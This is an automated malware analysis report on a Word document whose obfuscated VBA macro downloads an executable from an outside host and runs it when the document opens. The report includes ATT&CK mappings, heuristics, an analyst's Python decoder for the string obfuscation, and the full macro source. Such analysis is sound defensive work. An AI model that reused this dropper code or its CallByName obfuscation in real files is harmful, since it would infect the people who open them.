Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample carries a VBA project whose `Document_Open` handler in `ThisDocument` fires when the document is opened and calls `ziCyGtLhET.tEuAnmnNoX`, which runs `EiLevE` and from there the download routine `hfZqCeGBC`. The macro instantiates `WScript.Shell`, `MSXML2.ServerXMLHTTP.6.0` and `ADODB.Stream` with `CreateObject` and never names a COM member in clear text: every call goes through the `CallByName` wrappers in module `zivWxP`, and the member names (`Environment`, `Open`, `SetRequestHeader`, `Send`, `ResponseBody`, `Type`, `Write`, `SaveToFile`, `Close`, `Exec`) are rebuilt at run time by `tirUirwi.OThwuG`, which returns the characters of its first argument that do not occur in its second (a case-sensitive `InStr` filter). Applying that filter to the literals in the preview yields an HTTP GET of `hxxp://fprez[.]com/system/cache/word.exe` (defanged) with the User-Agent `Mozilla/4.0 (compatible;)`, the response body written to a binary `ADODB.Stream` and saved as `%TEMP%/7ea66232af.exe` (the `TEMP` value is read via `WScript.Shell.Environment("PROCESS")`), and finally `WScript.Shell.Exec` on that path. `EiLevE` wraps the whole sequence in `On Error GoTo`, so a failed download leaves the document opening silently. No literal `Shell()` call appears in the extracted source; execution is reached solely through `CallByName`. This is a plain downloader/dropper, consistent with the ClamAV signature `Doc.Dropper.Donoff-5743530-0` on the parent document; the carved `macros.bas` alone produces no ClamAV hit, so the detection comes from the OLE container rather than the decoded source.
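To make the dispatch chain readable without running the macro, the following Python is an added example (not code from the analyzer or from the sample) that ports the string filter `tirUirwi.OThwuG` and applies it to every obfuscated literal visible in the script preview. The literal/junk pairs are copied from the preview; the `VbCallType` values (1 method, 2 get, 4 let) are the standard VBA constants `CallByName` takes; the `"<ResponseBody>"` placeholder and the `%TEMP%` prefix are stand-ins for values that only exist at run time on the victim host.

```python
"""Added example: replay tirUirwi.OThwuG and the CallByName chain of the sample
in Python. Literal/junk pairs come from the macro preview; everything else is
analyst scaffolding, not code from the sample or the analyzer."""
from __future__ import annotations

from dataclasses import dataclass

# VBA VbCallType values as passed to CallByName in module zivWxP.
VB_METHOD, VB_GET, VB_LET = 1, 2, 4


def othwug(payload: str, junk: str) -> str:
    """Port of OThwuG: keep each character of payload that is absent from junk.
    VBA InStr defaults to binary (case-sensitive) compare, so an 'S' in junk
    does not strip an 's' from the payload."""
    return "".join(ch for ch in payload if ch not in junk)


# (obfuscated literal, junk set) pairs copied from the preview, keyed by the
# function or call site in which each literal appears.
LITERALS = {
    "wnEiH":        ("ThtDt pTB:S/T/fTSprBDe z. cT o m/BsDyD stD emB/DBcSa cThe /SBw orDdS.SeTBx e", "SDB T"),
    "SAcpVcW":      ("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX"),
    "oRyMOuK.arg1": ("P3RAWOVCVES3VS", ".A3VW"),
    "gRFLC.arg":    ("ZTEUMZsP", "9cZUsX"),
    "tsIVRe":       ("O/7vOeiav6O62vJ32vvamf.OJexiOe", "OivJm"),
    "ejEmLhof":     ("G.E TB", ".BA "),
    "yxnGhEe":      ("OYp4eCnC", "CY4 "),
    "AgrPU.hdr":    ("UJsJJerj-JJAjgJeJnGt", "GJj"),
    "vaDCWQGexY":   ("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp"),
    "AgrPU.ua":     ("MQCoJzXilgClYaX/C4C.g0 C(CXcoXmYYpYatYiQbgYlYe;C)g", "YJXQCg"),
    "HCFxEEPND":    ("SIerIndr", "MIrG"),
    "LgDWFy":       (".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO"),
    "TGGrY":        ("nTyHpaeB", "HBaqXn"),
    "ZWBbn.write":  ("Wbbribtzek", "Zzlmkb"),
    "pqTTm":        ("pSraUvremToVUFimlVed", "mprdUV"),
    "FzmIedRZZ":    ("YClm/o/s0e", "0dY/m"),
    "SeYuJBojru.m": ("kEx2eI1c", "k31IG2"),
}


def decode_all() -> dict[str, str]:
    """Decode every literal in LITERALS with the ported filter."""
    return {name: othwug(lit, junk) for name, (lit, junk) in LITERALS.items()}


@dataclass(frozen=True)
class Call:
    obj: str        # ProgID of the COM object the call is dispatched on
    member: str     # member name the macro reconstructs at run time
    call_type: int  # CallByName CallType: 1 method, 2 get, 4 let
    args: tuple


def drop_path(temp: str = "%TEMP%") -> str:
    """gRFLC: value of TEMP (read via WScript.Shell.Environment("PROCESS"))
    concatenated with tsIVRe. The sample joins with a forward slash, which
    Win32 paths accept. `temp` is a placeholder for the victim's real value."""
    return temp + othwug(*LITERALS["tsIVRe"])


def reconstruct_chain() -> list[Call]:
    """Replay the Document_Open -> tEuAnmnNoX -> EiLevE path of the preview,
    emitting each CallByName in zivWxP as a plain COM call, in the order
    hfZqCeGBC, then ZWBbn, then SeYuJBojru execute them."""
    d = decode_all()
    http, stream, shell = "MSXML2.ServerXMLHTTP.6.0", "ADODB.Stream", "WScript.Shell"
    path = drop_path()
    return [
        Call(shell, d["SAcpVcW"], VB_GET, (d["oRyMOuK.arg1"],)),           # .Environment("PROCESS")("TEMP")
        Call(http, d["yxnGhEe"], VB_METHOD, (d["ejEmLhof"], d["wnEiH"], False)),
        Call(http, d["vaDCWQGexY"], VB_METHOD, (d["AgrPU.hdr"], d["AgrPU.ua"])),
        Call(http, d["HCFxEEPND"], VB_METHOD, ()),
        Call(http, d["LgDWFy"], VB_GET, ()),                               # bytes of the download
        Call(stream, d["TGGrY"], VB_LET, (1,)),                            # adTypeBinary
        Call(stream, d["yxnGhEe"], VB_METHOD, ()),
        Call(stream, d["ZWBbn.write"], VB_METHOD, ("<ResponseBody>",)),    # placeholder for the bytes
        Call(stream, d["pqTTm"], VB_METHOD, (path, 2)),                    # adSaveCreateOverWrite
        Call(stream, d["FzmIedRZZ"], VB_METHOD, ()),
        Call(shell, d["SeYuJBojru.m"], VB_METHOD, (path,)),
    ]


def render(chain: list[Call]) -> str:
    """One line per call, in the form an analyst would paste into a report."""
    kind = {VB_METHOD: "", VB_GET: " [get]", VB_LET: " [let]"}
    return "\n".join(f"{c.obj}.{c.member}({', '.join(map(repr, c.args))}){kind[c.call_type]}"
                     for c in chain)


if __name__ == "__main__":
    print(render(reconstruct_chain()))
```

Running the script prints the eleven COM calls in execution order, with the decoded URL, User-Agent, drop path and `Exec` visible in clear text; the same filter can be pointed at any new `OThwuG` literal pair found in a related sample, since the routine is a pure character-set subtraction and does not depend on a key or on call order.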
Heuristics (10)

- ClamAV: Doc.Dropper.Donoff-5743530-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings). Document contains VBA macro code.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script, from `Public Function QIeYwGQcDT()` in module `HBSZwovgJ`: `Set QIeYwGQcDT = CreateObject("WScript.Shell")`.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: the same `CreateObject("WScript.Shell")` line; the preview also shows `CreateObject("MSXML2.ServerXMLHTTP.6.0")` and `CreateObject("ADODB.Stream")` in the same module.
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line in script, from `Public Sub JBGqPB` in module `zivWxP`: `CallByName yfRxWaL, vwIihNHwRg, 1`.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script, in `ThisDocument`: `Private Sub Document_Open()`.
- Reference to Windows Script Host (high, SC_STR_WSCRIPT).
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five below are XML namespace identifiers found in the document text (OLE body), not network indicators; the macro's download URL is assembled at run time by `tirUirwi.OThwuG` from an obfuscated literal and therefore does not appear in this list.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8685 bytes | 1c23a46288108a13cf6f10958bcb1ee11ef9e25ccabdd5c7f7880e2e128d3026 |

Detection (macros.bas):
- ClamAV: No threats found. The Doc.Dropper.Donoff-5743530-0 hit listed under Heuristics is on the parent document, not on the carved source.
- Obfuscation or payload: likely. 142 of 219 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG'), consistent with name-mangling obfuscation. Note that the quoted example is the obfuscated string literal inside `LgDWFy` (it decodes to `ResponseBody`), so the count includes tokens taken from string literals as well as true identifiers.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WYdZurj(ByVal nUPyPDdceo As String, ByVal TPRpbPmQCS As String)
wHTiRT
If mjspzU(9002, 675, "ZslO") Then
jGxNa True, "qVEIN", "dYuq"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub pqGeLr(ByVal DfeiPY As Integer)
YoQROe 280, "rEm", 3880
nSBNYIEqi
szgGkotf 3197, "s7cGX", True
End Sub
Private Sub Document_Open()
Dim rayiAM As Boolean
ziCyGtLhET.tEuAnmnNoX
End Sub
Private Sub lWyprRWv()
mqxGfUKgzi 6499, "JiAz", "h0jWb"
MmaltzrlX 1715
If hBTkqIt("") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function JZUPIUj() As String
yhlAeROGu
JZUPIUj = "IX6wT"
End Function
Attribute VB_Name = "HBSZwovgJ"
Private Sub kNtGZ(ByVal wKkcxXjA As Boolean, ByVal qGtxzruvA As Integer)
JdrgwQ
End Sub
Public Function QIeYwGQcDT() As Object
Dim GYPPhgwSJI As Boolean, FxaIym As String
Set QIeYwGQcDT = CreateObject("WScript.Shell")
End Function
Public Function xOEKtLwVn() As Object
Set xOEKtLwVn = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub gJYxp()
If euVWF Then
EqgCajclK 1379, False, "3b3t4"
End If
End Sub
Private Sub TYdqFrJ(ByVal vPiqaehkDU As String)
rwKYqDFg True, 2503
End Sub
Public Function MMFNY() As Object
Dim TAtuyTiY As Boolean
Set MMFNY = CreateObject("ADODB.Stream")
End Function
Private Function jqnkUUK() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "tfzt", "MT", 3231
jqnkUUK = 5750
End Function
Attribute VB_Name = "knodiW"
Public Function xDoszvxfJ(ByVal oQueYF As Integer, ByVal nyOGqE As Integer, ByVal wgQCT As String, ByVal phBpFKg As String) As String
Dim STjqUuQx As Integer, PsDspeSF As Integer
xDoszvxfJ = Mid(phBpFKg, oQueYF, 1)
End Function
Private Sub BNaEHg(ByVal zGXTd As Integer, ByVal TqsaoB As String)
BkMTwPAnUV "2aaR", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "lqc", "RiKq"
End If
nnWkkdeYWI "fH3q", "9kA", False
tvremm "2Za", "eej89", True
End Sub
Public Function NRSYHMIx(ByVal QkQiSpG As Integer, ByVal xFAMLNG As Boolean, ByVal QYvmLrB As String, ByVal cEOct As String) As String
NRSYHMIx = cEOct & QYvmLrB
End Function
Public Function fUwaMiNol(ByVal ySfnfgt As String, ByVal bazlEjPf As String) As Boolean
Dim naWyzQDkE As Integer
fUwaMiNol = InStr(1, bazlEjPf, ySfnfgt)
End Function
Attribute VB_Name = "tirUirwi"
Private Function sRGXI(ByVal UiDLFqDMy As Boolean, ByVal lvuJZD As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
sRGXI = False
End Function
Public Function OThwuG(ByVal rkxaUcqY As String, ByVal nMlOzdDx As String) As String
Dim OjWyjKn As Boolean
Dim BdLPTw As String
crcNfikH = "hAox"
For RTVIyfIss = 1 To Len(rkxaUcqY)
OjWyjKn = knodiW.fUwaMiNol(knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), nMlOzdDx)
If Not OjWyjKn Then
OThwuG = knodiW.NRSYHMIx(2102, True, knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), OThwuG)
fitPL = ""
End If
Next
End Function
Private Function rfPVXXPon() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
rfPVXXPon = 5758
End Function
Private Function pVgDS() As String
pVgDS = "Q5m"
End Function
Attribute VB_Name = "ziCyGtLhET"
Private Function oRyMOuK(ByVal BaLAefKDY As String, ByVal vHzzGv As String) As String
Dim VcSZuhfau As Integer
Set aGTjzuX = zivWxP.dcKBLbGs(SAcpVcW, HBSZwovgJ.QIeYwGQcDT, tirUirwi.OThwuG("P3RAWOVCVES3VS", ".A3VW"))
oRyMOuK = aGTjzuX(BaLAefKDY)
End Function
Private Function yxnGhEe() As String
yxnGhEe = tirUirwi.OThwuG("OYp4eCnC", "CY4 ")
End Function
Private Function SAcpVcW() As String
SAcpVcW = tirUirwi.OThwuG("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function xgiYagx() As String
xgiYagx = "1FaH"
End Function
Private Sub hfZqCeGBC(ByVal qaFAJ As String, ByVal QhYhbt As String)
Set zYVIGSsck = HBSZwovgJ.xOEKtLwVn
zivWxP.mAcTRLD ejEmLhof, tirUirwi.OThwuG("OYp4eCnC", "CY4 "), qaFAJ, zYVIGSsck, False
zivWxP.AgrPU tirUirwi.OThwuG("UJsJJerj-JJAjgJeJnGt", "GJj"), vaDCWQGexY, 2963, tirUirwi.OThwuG("MQCoJzXilgClYaX/C4C.g0 C(CXcoXmYYpYatYiQbgYlYe;C)g", "YJXQCg"), LEhcc, zYVIGSsck
zivWxP.JBGqPB 1177, zYVIGSsck, HCFxEEPND
ZWBbn True, 6317, QhYhbt, zivWxP.LRpuX(LEhcc, LgDWFy, zYVIGSsck)
End Sub
Private Function LgDWFy() As String
LgDWFy = tirUirwi.OThwuG(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub EiLevE()
Dim cIPEyduG As Integer
OIRUtHf = True
On Error GoTo xeSTzm
zIxdob = False
hfZqCeGBC wnEiH, gRFLC
SeYuJBojru gRFLC
Exit Sub
xeSTzm:
End Sub
Private Function gRFLC() As String
Dim YNmOHLMBF As Integer, hIKrUpMu As Integer
gRFLC = oRyMOuK(tirUirwi.OThwuG("ZTEUMZsP", "9cZUsX"), "nf") & oycrPfMb
End Function
Private Function TGGrY() As String
TGGrY = tirUirwi.OThwuG("nTyHpaeB", "HBaqXn")
End Function
Private Function oycrPfMb() As String
Dim YvsChVwYth As Integer
Dim AkGou As Integer
JJNlxuFaS = True
oycrPfMb = tsIVRe
End Function
Private Sub SeYuJBojru(ByVal ONtWMv As String)
zivWxP.YVjBqrLyxJ "if", HBSZwovgJ.QIeYwGQcDT, 7188, ONtWMv, tirUirwi.OThwuG("kEx2eI1c", "k31IG2")
End Sub
Private Function LEhcc() As String
LEhcc = "D9k"
End Function
Public Sub tEuAnmnNoX()
Dim JhZBmFQNK As Integer
Dim qKwvGumloC As Boolean
kZsag = 4121
EiLevE
End Sub
Private Function FzmIedRZZ() As String
FzmIedRZZ = tirUirwi.OThwuG("YClm/o/s0e", "0dY/m")
End Function
Private Function wnEiH() As String
Dim JSZINyhSId As Integer
wnEiH = tirUirwi.OThwuG("ThtDt pTB:S/T/fTSprBDe z. cT o m/BsDyD stD emB/DBcSa cThe /SBw orDdS.SeTBx e", "SDB T")
End Function
Private Sub ZWBbn(ByVal jdVfKLEFHy As Boolean, ByVal IsBrj As Integer, ByVal Gmumxvrhz As String, ByVal SOOqWKdo As Variant)
Dim oNKsSMFTa As Boolean
Dim MhlcMtb As Integer
Set urROlotAH = HBSZwovgJ.MMFNY
zivWxP.HPdra True, 1, urROlotAH, TGGrY
zivWxP.JBGqPB 1177, urROlotAH, yxnGhEe
uRUxACPwrk = 5904
zivWxP.YVjBqrLyxJ xgiYagx, urROlotAH, 7188, SOOqWKdo, tirUirwi.OThwuG("Wbbribtzek", "Zzlmkb")
sIbLjqP = "Gn"
zivWxP.AgrPU Gmumxvrhz, pqTTm, 2963, 2, xgiYagx, urROlotAH
zivWxP.JBGqPB 1177, urROlotAH, FzmIedRZZ
End Sub
Private Function ejEmLhof() As String
XBoKEL = False
ejEmLhof = tirUirwi.OThwuG("G.E TB", ".BA ")
End Function
Private Function pqTTm() As String
pqTTm = tirUirwi.OThwuG("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function tsIVRe() As String
tsIVRe = tirUirwi.OThwuG("O/7vOeiav6O62vJ32vvamf.OJexiOe", "OivJm")
End Function
Private Function vaDCWQGexY() As String
vaDCWQGexY = tirUirwi.OThwuG("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function HCFxEEPND() As String
HCFxEEPND = tirUirwi.OThwuG("SIerIndr", "MIrG")
End Function
Attribute VB_Name = "zivWxP"
Private Sub avcEIXr(ByVal DWTDS As Boolean, ByVal gDjVCb As Integer)
QzYClH "Ukt", 8941, "Ox"
End Sub
Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
CallByName yfRxWaL, vwIihNHwRg, 1
End Sub
Public Sub mAcTRLD(ByVal hyqvEXT As Variant, ByVal CyPNNcqPO As String, ByVal YGjItzV As Variant, ByVal foEFRfqWkY As Object, ByVal jtkSk As Variant)
IXNhTW = ""
CallByName foEFRfqWkY, CyPNNcqPO, 1, hyqvEXT, YGjItzV, jtkSk
End Sub
Public Function dcKBLbGs(ByVal ePoyCQ As String, ByVal VLtxeUpieQ As Object, ByVal MjhGLIcf As String) As Variant
Dim MXLUhG As Integer, bAmMXC As Integer
Set dcKBLbGs = CallByName(VLtxeUpieQ, ePoyCQ, 2, MjhGLIcf)
End Function
Public Sub AgrPU(ByVal IamjGclJY As Variant, ByVal mcmyHmAzvJ As String, ByVal McFGHaA As Integer, ByVal CmMeWqlkaz As Variant, ByVal qFoYKWTNs As String, ByVal fppFJG As Object)
CallByName fppFJG, mcmyHmAzvJ, 1, IamjGclJY, CmMeWqlkaz
End Sub
Public Sub HPdra(ByVal scsvvzFw As Boolean, ByVal EuVYIFH As Variant, ByVal TlFLzFt As Object, ByVal vzncfc As String)
CallByName TlFLzFt, vzncfc, 4, EuVYIFH
End Sub
Private Sub sfZFfFZ(ByVal nkXhelbfd As Integer, ByVal wFlNFy As Integer)
VYZRTX ""
FaPULoVT 5592, "040", ""
End Sub
Public Sub YVjBqrLyxJ(ByVal FRfgBCc As String, ByVal BoSBIxdpy As Object, ByVal vNgbfey As Integer, ByVal rvSbIsAIn As Variant, ByVal kuIPQRiG As String)
CallByName BoSBIxdpy, kuIPQRiG, 1, rvSbIsAIn
End Sub
Public Function LRpuX(ByVal wyKQFiqrlm As String, ByVal lDGcCyNh As String, ByVal iJhLFwZOdT As Object) As Variant
Dim RSTyzqKRy As Integer, UNYDxtaaT As Boolean
LRpuX = CallByName(iJhLFwZOdT, lDGcCyNh, 2)
End Function